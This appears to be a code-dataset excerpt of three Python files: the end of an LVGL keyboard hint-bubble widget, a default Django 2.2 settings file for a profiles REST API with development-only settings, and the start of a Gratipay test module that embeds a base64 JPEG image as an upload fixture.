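        # While a key is being pressed, show a floating hint bubble with the key's text just above
        # the touch point; hide it on release and forward the event to the user-supplied callback.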
if event == lv.EVENT.PRESSING:
feed_touch()
c = obj.get_active_btn_text()
if c is not None and len(c) <= 2:
self.hint.set_hidden(False)
self.hint_lbl.set_text(c)
point = lv.point_t()
indev = lv.indev_get_act()
lv.indev_get_point(indev, point)
self.hint.set_pos(point.x-25, point.y-130)
elif event == lv.EVENT.RELEASED:
self.hint.set_hidden(True)
if self.callback is not None:
self.callback(obj, event)
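# Minimal usage sketch (hypothetical screen and key map, not part of this module):
#
#   scr = lv.scr_act()
#   kb = HintKeyboard(scr)
#   kb.set_map(["1", "2", "3", "\n", "4", "5", "6", ""])
#   kb.set_event_cb(lambda obj, event: print(obj.get_active_btn_text()))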
|
py | 1a40c275b6b1ad5cab4c851a843a99f93b4941de | """
Django settings for profiles_project project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tv!n_c7#%+_gqfn3xs=6&jj!$bb^4i+k8y5u&rud@=hvq*_#5n'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'profiles_api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'profiles_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'profiles_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'profiles_api.UserProfile'
|
py | 1a40c2ab010c2309f8bca1b23c062d69ae086be2 | import base64
import json
from aspen.testing.client import FileUpload
from gratipay.testing import Harness, T
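# Small JPEG image (decoded from base64) used as the logo-upload fixture in the tests below.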
IMAGE = base64.b64decode(b"""\
/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0a
HBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAD9AeYDASIA
AhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQA
AAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3
ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWm
p6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEA
AwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSEx
BhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElK
U1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3
uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/pcH
GccUu47NvGM5puaAHvG6BWdGUONykjGR6imVP+8mgy82REAqqzc454ApkTrHIrMgcA5KknB9uKAI
6X61NPNHNdvKsCxxs5YRKThRnoO9NnaJ5maGMxxk/Khbdj8e9AEVLtO3dg49cU+GMSyqjSLGCfvP
0FStcTRW7WazlrcSFtqn5Semf0oArUVJKYSE8oODtG7cc898e1R0AFFFOVipJGORjkUANopSQcdB
UtwkMbgQTGVcAliu3n0oAhHHSlJJOScmkooAKKKKACiiigB6Ru+7aCdoyfYUypY7iWKORI3KrINr
gdxTBg5LHntx1oAbToygkBkUsmeQDg1Lc3AuZd4hii4A2xLgfWoKAFYqWO0EDPANJUrw7bdJfMjO
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
